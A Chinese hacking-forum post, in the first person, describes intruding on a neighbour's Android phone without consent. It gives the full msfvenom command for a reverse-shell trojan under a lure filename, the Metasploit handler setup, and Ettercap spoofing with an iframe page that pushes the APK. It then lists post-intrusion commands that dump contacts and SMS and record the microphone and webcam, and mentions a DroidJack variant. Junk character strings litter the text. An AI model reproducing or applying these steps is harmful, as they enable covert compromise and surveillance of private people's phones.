找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 278|回复: 0

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
发表于 2018-10-20 20:30:37 | 显示全部楼层 |阅读模式

( ~9 z; t' |' t# O$ r 五、msf+ettercap入侵邻居安卓手机 , U# d' |) \- r. U) e8 N

" }1 T1 \# K* ~1 I0 Z1 e) c

- @. o6 P5 H+ s/ y/ D7 } 首先启动msf / g0 ~: @- P: |# v

3 t" P3 M: r y4 e3 N+ a

1 a$ k: U/ [/ `' D 先用kali生成一个安卓木马,如下命令: 3 L1 [. m9 R* s% w% {7 l$ y" P- F% k

$ e% K& |% ?2 ?5 t' m

7 c9 O9 S" s8 u Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : O) f# o- ]$ q$ @

& e+ H! I# V/ m5 a% I" Z

+ j+ d3 n& F- }5 F 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 " J; W: F! h7 w$ y/ {) I

7 j+ ~9 F1 }! v, y1 ?" `% l; Q

& \, f- q7 C! N- j3 H3 J3 o 然后进入msf 8 Y% ]5 J+ E5 f

: m U! t" n: }+ g) ]

) Z' x( r6 K0 O" U# A ?# G use exploit/multi/handler 6 B/ X- x4 g: U, [7 L

; G& T% e! D; T% f6 x

1 S" ], Y4 K; U. z* r set payload android/meterpreter/reverse_tcp $ r/ X1 p5 t3 Z

; ]) ^/ K3 U0 L) M6 G

3 ~( R: D" M. f9 Q, e' {/ b set LHOST 192.168.0.109 //ipkailiip ' }! J; r# t) K, {6 w# o4 s

0 F/ p8 a) U3 @7 {9 E

! `5 `% E& p+ J: \8 y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 C/ A' i# |! R. P( m

: B7 b- A5 }2 V+ S) C) a9 v

5 p8 M% P9 h- Y Exploit * p: ?: ~- F# k2 g

/ K4 n5 P( w% o4 g* R, v# a

5 a D6 s: J( v& |/ F   + R! o. U# i0 \# Q

5 s2 l1 B, K( |' e

- E6 [6 u2 G, h% r 下面我们开启ettercap -G 9 g8 y% }$ I+ E0 I

! e4 F4 V9 k1 `7 ^

) y5 R( D: U ~' {: u# ^# \# q5 c: j 我物理IP : C/ o1 t& ?" P( p: ~: i

! \+ R. ]: i& c9 [, T7 R

0 D& @% r: v* n$ c9 }6 }# F0 w3 l   ; A) t5 |" r( i& c" n

8 H% D9 J4 y# p- e6 u V' X" p

4 \: g. q9 Y+ k' @9 `6 T$ f5 G 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 3 q% ~9 L% e, o6 z2 @; Q

$ O. i" h5 K" j1 {, g

. ^5 ?; W4 n; x; }! y+ K 下面我们来设置一下 - D; y7 C4 p p( A, z

4 g. {! I ?, Y# |( f/ }" i6 T% b( e

" h' e) l) O; A6 \; ?   9 U$ L% K) t( Q# K, U9 C

. S0 [. l! R# W

N- M+ }" _6 a+ r7 C 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ) r# U9 F3 |5 D+ }: u2 z. P

- o( }( N+ v- r, }

! f# O/ P. O9 R% H8 N7 Z. t( S   4 c8 i( Z3 Y; B/ ^

+ M+ K# J; h9 f0 ` e9 [; l8 `

# T: W9 u) c# }! e, d   2 O$ f* Y) [( D8 s

' S/ `- ~3 b% Y8 S. C

3 F( {. h4 h& w, P! ? v2 O   + s; l7 d$ _$ H" q ]

6 f. }; |# j& D1 x1 G1 V7 S+ R4 J

4 B) f X5 e( g7 }: y7 c( Q3 T/ J   " m! E% _$ _: ^2 \4 a' E1 c$ e7 P$ T

! ?7 s$ `) a. B' Q1 f; G9 k4 u6 {8 K

( p- p0 V1 D/ D; J   3 O2 H# N5 h- {% |0 ^4 w' b

* a) U% q" ~& I- o. W

: r0 h& c$ s5 A   # C c, c. }! K, M

- ?6 B y/ f& ^1 N( r! |

& u- ?/ c8 Z' C6 q9 V: d   6 v! y8 Y3 g. T6 k7 n3 s3 z" f- c

9 Y/ l0 G5 @' V* c0 h4 ^: P

) ?! s" X' l: N* `+ H8 b7 ^0 ~5 Y- W   $ ~& b0 W- J& [+ V( c

* l+ x' A/ f. V* W1 E g

% Z, ?8 v1 t! |" G   9 H. j" p0 A2 L& X. O

/ e3 Y2 i7 l( d. f1 [- o

4 `6 l M9 P: M- T: X) G   6 |8 i2 f. s+ j7 J6 k- ~

8 d3 z% N& q l. b

. c" P6 [6 ?" r1 F6 Y* p4 V   ) X) F9 G- M& w8 S! M/ ?: e

2 t9 T4 h# X* [; E

, F2 n' p, { x0 Q' P   . k4 R" H+ j1 C: O4 v5 a

# m8 X( G( _: c) B0 L% t

1 D- z) k* @: |4 v0 ?1 G" l9 H   " g! x C9 u9 i$ H/ g1 _6 } y

/ ~; [- B, ], m% X3 r; \

J, e( R# X1 C- V& O* \ 下面我们开始攻击 * J" H% i5 W4 @0 p$ W

+ f$ R! D) {& c2 A, `+ F" W$ r; b

3 |) ]' U; ]! [- q. N2 _5 R   + i- C+ C- [* P& u

* X( u8 \( Q7 _# _' h: y/ A

! ]+ `" R1 i# j" Q: p& i   , z) T1 b z; e0 z0 j& q

- B0 E0 H* D* [1 o. N y' d

) v+ u- i) |8 Z/ z5 T   + z9 i9 ~0 o# u K( N

+ s9 X4 y! B8 O- Y6 p) {" f& z

9 n2 p) |9 B- P; f% }: b6 V   R4 L* ~! {( M; p0 S. w

7 Z" H3 j- Y0 r8 u

: N% [7 r1 n+ J   0 b* e) y4 z8 D$ n( f9 @

{8 l; ~4 H% ]6 K. X Y8 f8 j" z& }

& ?' Y& o0 f0 ?: J7 ~ I, W h 大概过了5分钟多,发现反弹成功了 ; B: y) _! B# R3 { _

. ~9 u0 e9 ^% ]# y2 X1 ], y

* u7 G# t* J' F; R& c5 \   ! F& \5 F: _( v3 _9 E+ y: e

, O. v$ ^. o0 x2 s

; z! N/ F3 o5 h   ) p8 T& d; y j M( ^

0 U2 o! l$ s9 b7 _" i

( @. S) _2 t# o/ [8 h% R% |$ J   / t0 x1 W3 m% u* a2 x- t

6 d6 D: Z+ Q' f/ m. t% c2 S7 Z

7 A, Y1 k& c5 d   ( U; F4 g7 v ^1 i

1 O3 o, u/ `8 y( ?

" h P4 S, M- \3 S7 B2 ~( r   " p5 S. e8 x5 ]; K# O9 ^

$ I; Z+ d% l/ E- |5 C6 k7 o* h0 u: d3 f

; Z# a: h* S! z" \2 Z# U# F   3 I2 v- ?% K" R/ _& Y

! y w8 o: u# _" Q( O4 r

0 V; K# @4 Z: W6 ^/ u" Y! d   % d( W7 b: ?% H

2 h8 ?3 N; C4 m; `8 D" R) S3 R

% f; s+ C2 G2 \8 r6 F% ^ 执行命令 4 b9 u% {/ k2 Z3 D- M, o

2 T! n: O, X5 t

" E3 m4 [5 B' h5 w' G   + O$ ^1 \ B: I6 Z$ S1 A4 o! W2 W

" [0 Z& \; R4 o/ _; ?1 ~. _ m- d9 T

+ _ h8 l% [ O; J3 E/ N7 R, U dump_contacts    --》这个是导出电话 7 h6 e. i% Z ?! G4 g: B

+ d4 n9 @" b) y5 U

* o2 E2 P/ \# h6 [! r* w3 O dump_sms --》这个是导出信息 7 i2 y1 q B" p4 D q! y3 E

& `" i# t# ~1 E& M

; v- Z4 Z7 `( J record_mic     Record audio from the default microphone for X seconds $ h! D. w# u9 s8 f

% I, x2 F1 e; Q$ d% g/ o

2 ~+ t5 s' n8 p$ s- J# I5 u1 `     webcam_chat    Start a video chat 4 n$ `6 {1 J9 Z+ y$ d/ R- ?

$ g$ P# P; l) M! b. P; [* z; {

, K6 `; ?3 K) s# t* {9 l+ p     webcam_list    List webcams # i6 D* r- N; e ~5 n j9 }4 ~9 E

: L4 h$ u4 J7 W( A3 }

- b m% s" k# I# Y5 d% X0 e2 a$ ^     webcam_snap    Take a snapshot from the specified webcam & I5 |) b/ H" s. W

) Y# ^; S/ P+ s8 o8 h2 ^

2 G0 J8 @" ~7 V% W( w4 B/ ^ P# h webcam_stream  lay a video stream from the specified webcam & e( v- I5 p( ?4 x% K/ J7 J8 E

+ v5 i ~3 K9 _

( i. q+ B! v& z! s( C   3 @# c: B+ W# ]- ~2 u

2 o+ s3 Q4 d( F% b; g

2 ^; x$ n$ K; H+ h2 s. ^4 o- b   + A" W$ r) R$ s. F

! |, |5 u5 n' D' d1 Y

! K* s0 L6 n: }/ b) d& p! U3 W8 m 我们打开看一下电话薄, 5 {+ f" r+ P) S! w

3 i4 g* K+ \+ V" c" Y( w6 d- C2 W

& l" K% ~% q# f6 B$ q& C3 g) t   5 }" r# J1 K/ t* ~: V$ B5 W) c5 k

5 w# O M1 ^3 p0 S" m" M

! A& s& g! _, e4 }( z   ( I1 j) a: Q4 }9 g$ a' F4 q0 B/ Q

" U; }/ a7 w* x: W

, e. @8 n# Y) _( o7 S   - |7 n! Z' d( l9 Z7 A

/ j# Y" }6 l6 C, q

0 G" Y" ]! U' P! x* O+ }9 o# l' ?   ! k8 J; N- H2 z# Q2 ]% e b9 a( y

' E: S; A Z, ~1 J3 [2 U3 C

( G2 c: e2 C- P   1 }. ?/ ^8 A* T, W* P) I( E

- c- D( B* k0 r. f8 M2 \

0 i% w% k4 J0 K/ F   , b" V, v+ Z4 G' E1 A( {+ ~3 E

: f$ Z7 Q2 _5 n( ~1 n9 F

- C, H% N# G7 v. l+ R) { 我们同时欺骗成DroidJack木马,使用方法如图: 4 f8 U1 D7 G2 s1 I F. m5 x' M+ S

2 Q! u% b+ [' f' \$ u% F$ A1 L

5 g0 y0 F$ T; U8 y   + W" H* r1 ?8 O6 y( T0 Z1 d

# \% H4 S1 h; q. }

+ {& g; Y! D( j) e   0 y5 ^' F" i0 D* b, ^9 |) R5 v& |

$ S u& y' H" g

' S& L$ v% b( X' h- X* E, s/ K   5 P5 e3 Z: r' p7 u' e; A: ?

6 S! H: |, V# P7 f! I& q

& L0 C) D6 }" k/ e" M 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 - d8 { j0 j A6 N

" R& R! ]0 R r, d; t# X. i5 J A

: S% q5 a T/ s5 ?5 W; d, S   % P; [& q* S/ c+ T" h& O9 A8 O

: n7 l4 L" j9 C m1 a

4 @0 @9 ~$ A2 c   s- `8 ~1 H7 Y1 |, d

/ d) a9 n ^+ R% z. g2 L

; F1 j) e% B& U& X. b   % z5 R6 T" F0 M/ B/ }% r3 A

, e, N+ {2 |, x- k# @

5 ^/ R" K' }, `/ D5 ~9 I: k ( @* i* z! B6 y" S

: B* I2 x/ F2 @0 o) u

" d+ Y6 i- ~; _! \# @! [, x
6 U! I/ v* m8 h& L- @3 p3 v

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表